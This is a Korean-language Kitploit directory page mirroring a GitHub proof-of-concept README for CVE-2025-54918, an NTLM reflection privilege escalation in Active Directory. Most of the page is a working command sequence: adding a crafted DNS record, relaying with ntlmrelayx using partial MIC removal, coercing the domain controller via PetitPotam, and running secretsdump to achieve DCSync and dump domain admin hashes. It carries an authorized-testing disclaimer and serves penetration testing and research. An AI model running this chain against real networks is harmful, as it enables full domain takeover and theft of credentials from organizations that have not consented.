Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-54918-POC — CVE-2025-54918에 대한 POC 및 기술 시연. | Kitploit
도구/GitHubGitHub/wh0am123/cve-2025-54918-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingAuthenticationLearning & EducationRed TeamingLabs & Practice
GitHubwh0am123/cve-2025-54918-poc

CVE-2025-54918-POC

CVE-2025-54918에 대한 POC 및 기술 시연.

저장소 보기
6477개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-54918 – 개념 증명(PoC)

⚠️ 중요 공지

중요:
CVE-2025-54918을 테스트하려면 대상 Active Directory 환경에 DNS 레코드를 생성해야 합니다.
테스트 전에 항상 클라이언트와 상의하고 명시적 승인을 받으십시오. 이는 프로덕션 환경에서 DNS 및 인증 동작에 영향을 줄 수 있습니다.

이 저장소는 낮은 권한의 도메인 사용자가 NTLM 리플렉션과 인증 강제(coercion)를 결합하여 남용함으로써 도메인 관리자 수준의 액세스로 권한을 상승시키는 방법을 보여주는 **기술적 개념 증명(PoC)**입니다.

참고: 이 CVE는 도메인 컨트롤러의 기본값인 서명(signing)이 True로 설정된 경우에도 악용 가능합니다. 또한 CVE-2025–54918 수정은 Windows 2025용이었으며, CVE-2025–33073은 Windows 2022용으로 (의도치 않게) 수정되었습니다.

보다 기술적인 분석은 제 Medium 페이지에서 확인할 수 있습니다: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1


환경

  • 도메인 컨트롤러 IP: 192.168.140.150 (서명(Signing)이 True이며 이는 도메인 컨트롤러의 기본값입니다)
  • 공격자 IP: 192.168.140.135
  • 도메인: nahya.local
  • 사용자: test 유효한 도메인 사용자 (DCSync 권한 없음)

도구

필요한 저장소를 클론합니다:

root@kitploit:~
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git

기본 검증 (예상되는 실패)

악용 전에 사용자가 DCSync를 수행할 수 없는지 확인합니다:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

일반 사용자


1단계: 악성 DNS 레코드 추가

공격자 IP로 해석되는 NetBIOS 이름 + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA를 사용하여 DNS 레코드를 생성합니다.

root@kitploit:~
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
  dc.nahya.local -a add \
  -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
  -d '192.168.140.135' -dns-ip 192.168.140.150

DNS 추가


2단계: NTLM 릴레이 시작 (터미널 1)

부분 MIC 제거 및 LDAP 권한 상승을 활성화한 상태로 ntlmrelayx를 실행합니다:

root@kitploit:~
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC  --escalate-user USERNAME  --no-validate-privs

ntlmrelayx 시작


3단계: 도메인 컨트롤러 인증 강제 (터미널 2)

강제(coercion) 기법(PetitPotam)을 사용하여 도메인 컨트롤러가 공격자가 제어하는 DNS 레코드로 인증하도록 강제합니다:

root@kitploit:~
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

DC 강제


4단계: 악용 확인 (DCSync)

권한 상승을 확인하기 위해 secretsdump를 다시 실행합니다:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

✅ 예상 결과: DCSync 성공 및 도메인 관리자 해시 획득

DCSync 성공


결과

이 시점에서 공격자는 다음을 수행했습니다:

  • 도메인 컨트롤러(서명 True)의 NTLM 인증을 릴레이
  • LDAP를 통한 권한 상승
  • DCSync 달성으로 전체 도메인 장악

취약점과 공격 체인에 대한 자세한 설명은 Medium 문서를 참조하십시오.


🙏 크레딧

이 작업은 다음 분들의 도움 없이는 불가능했습니다:

  • Bryan De Houwer – CVE-2025-54918의 저자 https://www.linkedin.com/in/bryan-de-houwer/
  • Andrea Pierini – decoder.cloud에서의 훌륭한 연구와 블로그 기여 https://www.linkedin.com/in/andrea-pierini-aba9a37/
  • Andrea Pierini – impacket-partial-mic 구현
    https://github.com/decoder-it/impacket-partial-mic

🔗 참고 자료

  • NTLM 및 LDAP 인증 우회 취약점 분석 – CrowdStrike 블로그
    https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/

  • Microsoft 보안 공지 – CVE-2025-54918 – MSRC 업데이트 가이드
    https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918


면책 조항

이 개념 증명(PoC)은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

  • 소유하지 않았거나 테스트에 대한 명시적 권한이 없는 시스템에 이 기법을 사용하지 마십시오.
  • 저자는 오용 또는 피해에 대해 책임을 지지 않습니다.
  • 항상 책임 있는 공개(responsible disclosure) 및 윤리적 해킹 관행을 준수하십시오.
도구 다운로드